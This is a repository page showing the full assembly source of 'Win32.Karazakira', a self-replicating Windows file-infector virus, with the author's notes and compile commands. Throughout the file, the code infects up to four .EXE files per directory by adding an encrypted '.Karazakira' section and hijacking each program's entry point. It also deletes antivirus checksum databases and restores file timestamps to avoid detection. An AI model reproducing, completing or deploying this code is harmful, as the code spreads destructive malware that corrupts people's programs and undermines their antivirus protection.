MalwareSourceCode/Win32/Infector/Win32.Karazakira.asm

568 lines
14 KiB
NASM
Raw Permalink Normal View History

2020-10-11 03:07:43 +00:00
; _ __ ____ __ ___ __ _ _ ____ __
; | |/\ / \ | _ \ / \ / _ \ / \ | |/\ | | | _ \ / \
; | _/ | || | | / | || | |// / | || | | _/ | | | / | || |
; | \ | | | |\ \ | | / /|\ | | | \ | | | |\ \ | |
; |_|\/ |_||_| |_||_| |_||_| /____/ |_||_| |_|\/ |_| |_||_| |_||_|
; By Psychologic/rRlf
;
; Kara-Intro :
;
; This is my 3rd win32asm virus, I named it as an Indian's ring "KARAZAKIRA"
; which belived can call a soul from the deathman (a man who has been die)
; well, I think this is unique name.
; Workz :
;
; When Karazakira file executed, Karazakira searches for 4 PE *.EXE files in the current
; and windows directory. Those files will be infected by adding a new section called
; ".Karazakira" (called in infect section as ptr [edi], "raK.").
; File modification works by direct access, not by memory mapping (Bad idea right..??)
; well it just for different touch, hehe :P
; Feature :
;
; * full Win32 compatible
; * encrypted using DIV algorithm
; * Infecting windows directory
; * Deleting some AV checksum files
; Compile :
;
; tasm32 /mx /m karazakira.asm
; tlink32 /Tpe /aa karazakira.obj,,, import32.lib
; ====================================================================================
; ====================================================================================
;
; ====================================================================================
; ====================================================================================
length_virus_file EQU (end_static - start)
length_virus_mem EQU (end_mem - start)
length_encrypted EQU (end_encrypted - encrypted)
length_PE_header EQU 1000
Extrn MessageBoxA:Proc
Extrn ExitProcess:Proc
.386p
.model flat
.data
start:
pushad
pushfd
db 0BDh
delta_offset dd 0
lea esi, [ebp+offset encrypted]
mov edi, esi
mov ecx, length_encrypted / 8
db 0BBh
crypt_key dd 0
rush_code:
copyright db "Win32.Karazakira By Psychologic", 0
db "On Friday, second January '05 - Depok City, Indonesia", 0
GetProcAddress db "GetProcAddress", 0
l_GPA = $ - offset GetProcAddress
FindFirstFileA db "FindFirstFileA", 0
FindNextFileA db "FindNextFileA", 0
FindClose db "FindClose", 0
CreateFileA db "CreateFileA", 0
CloseHandle db "CloseHandle", 0
ReadFile db "ReadFile", 0
WriteFile db "WriteFile", 0
DeleteFileA db "DeleteFileA", 0
SetFilePointer db "SetFilePointer", 0
SetFileAttributesA db "SetFileAttributesA", 0
SetFileTime db "SetFileTime", 0
SetCurrentDirectoryA db "SetCurrentDirectoryA", 0
GetCurrentDirectoryA db "GetCurrentDirectoryA", 0
GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
GetSystemDirectoryA db "GetSystemDirectoryA", 0
GetTickCount db "GetTickCount", 0
anti_vir_dat db "ANTI-VIR.DAT", 0
chklist_ms db "CHKLIST.MS", 0
chklist_cps db "CHKLIST.CPS", 0
avp_crc db "AVP.CRC", 0
orig_eip dd offset quit_1st_gen
filemask db "*.EXE", 0
new_section_header:
db ".Karazakira", 0, 0
VirtualSize dd length_virus_mem
VirtualAddress dd 0
PhysicalSize dd length_virus_file
PhysicalAddress dd 0
dd 0, 0, 0
dd 0E0000020h
if ((($-encrypted) mod 8) NE 0)
db (8-(($-encrypted) mod 8)) dup(0)
endif
decrypt:
lodsd
xchg eax, edx
lodsd
cmp edx, ebx
JA no_mul
push ebx
push edx
mul ebx
pop ebx
add eax, ebx
adc edx, 0
pop ebx
stosd
xchg eax, edx
stosd
LOOP decrypt
JMP encrypted
no_mul:
stosd
xchg eax, edx
stosd
LOOP decrypt
encrypted:
mov eax, [ebp+offset orig_eip]
mov [ebp+offset host_entry], eax
push offset seh_handler
push dword ptr fs:[0]
mov fs:[0], esp
mov eax, [esp+11*4]
scan_kernel:
cmp word ptr [eax], "ZM"
JNE kernel_not_found
mov ebx, [eax+3Ch]
add ebx, eax
cmp dword ptr [ebx], "EP"
JE kernel32_found
kernel_not_found:
dec eax
JMP scan_kernel
kernel32_found:
mov [ebp+offset kernel32], eax
mov ebx, [ebx+120]
add ebx, eax
mov edx, [ebx+20h]
add edx, eax
mov ecx, [ebx+18h]
GPA_search:
push ecx
mov esi, [edx]
add esi, eax
lea edi, [ebp+offset GetProcAddress]
mov ecx, l_GPA
cld
rep cmpsb
pop ecx
JE GPA_found
inc edx
inc edx
inc edx
inc edx
LOOP GPA_search
GPA_not_found:
JMP return_to_host
GPA_found:
mov edx, [ebx+18h]
sub edx, ecx
shl edx, 1
add edx, [ebx+24h]
add edx, eax
xor ecx, ecx
mov cx, [edx]
shl ecx, 2
add ecx, [ebx+1Ch]
add ecx, eax
mov ebx, [ecx]
add ebx, eax
mov [ebp+offset GPA_addr], ebx
lea eax, [ebp+offset curdir]
push eax
push 260
lea eax, [ebp+offset GetCurrentDirectoryA]
call call_API
push 260
lea eax, [ebp+offset windir]
push eax
lea eax, [ebp+offset GetWindowsDirectoryA]
call call_API
lea eax, [ebp+offset windir]
push eax
lea eax, [ebp+offset SetCurrentDirectoryA]
call call_API
call infect_dir
lea eax, [ebp+offset curdir]
push eax
lea eax, [ebp+offset SetCurrentDirectoryA]
call call_API
call infect_dir
return_to_host:
pop dword ptr fs:[0]
pop eax
popfd
popad
db 068h
host_entry dd 0
ret
seh_handler:
mov esp, [esp+8]
JMP return_to_host
infect_dir:
mov dword ptr [ebp+infectioncount], 4
lea eax, [ebp+offset anti_vir_dat]
call kill_file
lea eax, [ebp+offset chklist_ms]
call kill_file
lea eax, [ebp+offset chklist_cps]
call kill_file
lea eax, [ebp+offset avp_crc]
call kill_file
lea eax, [ebp+offset find_data]
push eax
lea eax, [ebp+offset filemask]
push eax
lea eax, [ebp+offset FindFirstFileA]
call call_API
mov [ebp+offset search_handle], eax
inc eax
JZ end_infect_dir
infect:
push 80h
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
push 0
push 80h
push 3
push 0
push 0
push 0C0000000h
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset CreateFileA]
call call_API
mov [ebp+offset file_handle], eax
inc eax
JZ restore_attributes
push 0
lea eax, [ebp+offset bytes_read]
push eax
push 64
lea eax, [ebp+offset dos_header]
push eax
push [ebp+file_handle]
lea eax, [ebp+offset ReadFile]
call call_API
cmp word ptr [ebp+offset exe_marker], "ZM"
JNE close
push 0
push 0
push dword ptr [ebp+offset new_header]
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
push 0
lea eax, [ebp+offset bytes_read]
push eax
push length_pe_header
lea eax, [ebp+offset pe_header]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset ReadFile]
call call_API
cmp dword ptr [ebp+offset pe_marker], "EP"
JNE close
test word ptr [ebp+offset flags], 0010000000000000b
JNZ close
lea ebx, [ebp+offset optional_header]
add bx, word ptr [ebp+offset SizeOfOptHeader]
xor eax, eax
mov ax, word ptr [ebp+offset NumberOfSections]
dec eax
mov ecx, 40
mul ecx
add eax, ebx
mov edi, eax
cmp dword ptr [edi], "raK."
JE close
mov eax, [ebp+offset EntryPoint]
add eax, [ebp+offset ImageBase]
mov [ebp+offset orig_eip], eax
inc word ptr [ebp+offset NumberOfSections]
mov eax, [edi+12]
add eax, [edi+8]
mov ebx, [ebp+offset SectionAlign]
call align_EAX
mov [ebp+offset VirtualAddress], eax
mov [ebp+offset EntryPoint], eax
add eax, [ebp+offset ImageBase]
sub eax, offset start
mov [ebp+offset delta_offset], eax
mov eax, length_virus_mem
call align_EAX
add dword ptr [ebp+offset SizeOfImage], EAX
mov eax, [edi+20]
add eax, [edi+16]
mov ebx, [ebp+offset FileAlign]
call align_EAX
mov [ebp+offset PhysicalAddress], eax
push 0
push 0
push eax
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
mov eax, length_virus_file
call align_EAX
mov [ebp+PhysicalSize], eax
mov ecx, 40
lea esi, [ebp+offset new_section_header]
add edi, ecx
cld
pusha
xor eax, eax
repe scasb
popa
JNE close
rep movsb
push eax
lea eax, [ebp+offset GetTickCount]
call call_API
mov ebx, eax
ror eax, 8
xor ebx, eax
mov [ebp+offset crypt_key], ebx
lea esi, [ebp+offset start]
lea edi, [ebp+offset crypt_buffer]
mov ecx, length_virus_file
rep movsb
lea esi, [ebp+offset crypt_buffer+(encrypted-start)]
mov edi, esi
mov cx, length_encrypted / 8
encrypt:
lodsd
xchg eax, edx
lodsd
xchg eax, edx
cmp edx, ebx
JA no_div
div ebx
no_div:
xchg eax, edx
stosd
xchg eax, edx
stosd
loop encrypt
pop eax
push 0
lea ecx, [ebp+offset bytes_read]
push ecx
push eax
lea eax, [ebp+offset crypt_buffer]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset WriteFile]
call call_API
push 0
push 0
push dword ptr [ebp+offset new_header]
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
push 0
lea eax, [ebp+offset bytes_read]
push eax
push length_pe_header
lea eax, [ebp+offset pe_header]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset WriteFile]
call call_API
dec dword ptr [ebp+infectioncount]
close:
lea eax, [ebp+offset LastWriteTime]
push eax
lea eax, [ebp+offset LastAccessTime]
push eax
lea eax, [ebp+offset CreationTime]
push eax
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFileTime]
call call_API
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset CloseHandle]
call call_API
restore_attributes:
push dword ptr [ebp+offset FileAttributes]
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
find_next:
mov ecx, [ebp+infectioncount]
JCXZ close_find
lea eax, [ebp+offset find_data]
push eax
push dword ptr [ebp+offset search_handle]
lea eax, [ebp+offset FindNextFileA]
call call_API
dec eax
JZ infect
close_find:
push dword ptr [ebp+offset search_handle]
lea eax, [ebp+offset FindClose]
call call_API
end_infect_dir:
ret
kill_file:
push eax
push 80h
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
lea eax, [ebp+offset DeleteFileA]
call call_API
RET
call_API:
push eax
push dword ptr [ebp+offset kernel32]
call [ebp+offset GPA_addr]
JMP eax
align_EAX:
xor edx, edx
div ebx
or edx, edx
JZ no_round_up
inc eax
no_round_up:
mul ebx
RET
end_encrypted:
end_static:
heap:
crypt_buffer db length_virus_file dup(?)
padding db 1024 dup(?)
windir db 260 dup(?)
curdir db 260 dup(?)
kernel32 dd ?
GPA_addr dd ?
search_handle dd ?
file_handle dd ?
bytes_read dd ?
infectioncount dd ?
find_data:
FileAttributes dd ?
CreationTime dq ?
LastAccessTime dq ?
LastWriteTime dq ?
FileSize dq ?
wfd_reserved dq ?
FileName db 260 dup(?)
DosFileName db 14 dup(?)
dos_header:
exe_marker dw ?
dosheader_shit db 58 dup(?)
new_header dd ?
pe_header:
pe_marker dd ?
machine dw ?
NumberOfSections dw ?
TimeDateStamp dd ?
DebugShit dq ?
SizeOfOptHeader dw ?
flags dw ?
optional_header:
optional_magic dw ?
linkerversion dw ?
SizeOfCode dd ?
SizeOfDATA dd ?
SizeOfBSS dd ?
EntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
SectionAlign dd ?
FileAlign dd ?
OSVersion dd ?
OurVersion dd ?
SubVersion dd ?
reserved1 dd ?
SizeOfImage dd ?
SizeOfHeader dd ?
Checksum dd ?
org offset pe_header+length_pe_header
end_mem:
.code
start_1st_gen:
pushad
pushfd
xor ebp, ebp
JMP encrypted
quit_1st_gen:
push 0
push offset caption
push offset message
push 0
call MessageBoxA
push 0
call ExitProcess
caption:
db "Win32.Karazakira by Psychologic"
db 0
message db "Freee palestine...freee palestine", 0
end start_1st_gen